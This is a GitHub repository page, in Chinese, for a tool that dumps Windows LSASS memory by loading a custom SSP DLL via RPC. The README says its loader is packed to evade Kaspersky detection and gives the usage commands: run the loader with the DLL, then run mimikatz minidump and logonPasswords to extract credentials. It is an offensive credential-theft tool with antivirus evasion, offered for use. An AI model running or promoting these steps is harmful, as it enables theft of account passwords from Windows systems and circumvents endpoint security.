Skip to content

xunyang1/ssp_dump_lsass

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
Project4
Project4
 
 
ssp_rpc_loader
ssp_rpc_loader
 
 
README.md
README.md
 
 

Repository files navigation

ssp_dump_lsass

https://github.com/whyjoezk/dump_lsass/tree/1c07b4038c7ef2c60584bec05d19ec4141ecb3cf
参考这个仓库,可能是本机环境问题,该仓库的dll无法dump出lsass
这里又参考以下两篇文章重新生成dll
https://blog.csdn.net/qq_39101049/article/details/105550641
https://www.cnblogs.com/w0x68y/p/14138953.html
使用vs2019编译,选择x64编译,未设置字符集
对于exe进行了加壳防止卡巴查杀,在x64目录下

使用方法

ssp_rpc_loader_protected.exe c:\Users\xxx\Desktop\Project4.dll
dir c:\
mimikatz.exe "sekurlsa::minidump 1.bin" "sekurlsa::logonPasswords full" "exit"

效果

最终dump内存时成功绕过kaba检测
image

About

RPC 调用添加ssp扩展dump lsass

Resources

Readme
Activity

Stars

14 stars

Watchers

1 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages